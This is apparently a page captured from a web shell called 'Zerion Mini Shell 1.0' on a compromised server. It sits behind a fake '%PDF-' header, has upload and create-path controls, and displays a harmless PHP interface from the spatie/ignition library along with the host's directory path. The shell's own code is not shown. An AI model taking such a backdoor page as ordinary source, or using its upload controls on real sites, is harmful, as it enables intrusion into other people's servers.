%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/silvzytp/crm-dub-code/vendor/spatie/ignition/src/Contracts/
Upload File :
Create Path :
Current File : /home/silvzytp/crm-dub-code/vendor/spatie/ignition/src/Contracts/HasSolutionsForThrowable.php

<?php

namespace Spatie\Ignition\Contracts;

use Throwable;

/**
 * Interface used for SolutionProviders.
 */
interface HasSolutionsForThrowable
{
    public function canSolve(Throwable $throwable): bool;

    /** @return array<int, \Spatie\Ignition\Contracts\Solution> */
    public function getSolutions(Throwable $throwable): array;
}

Zerion Mini Shell 1.0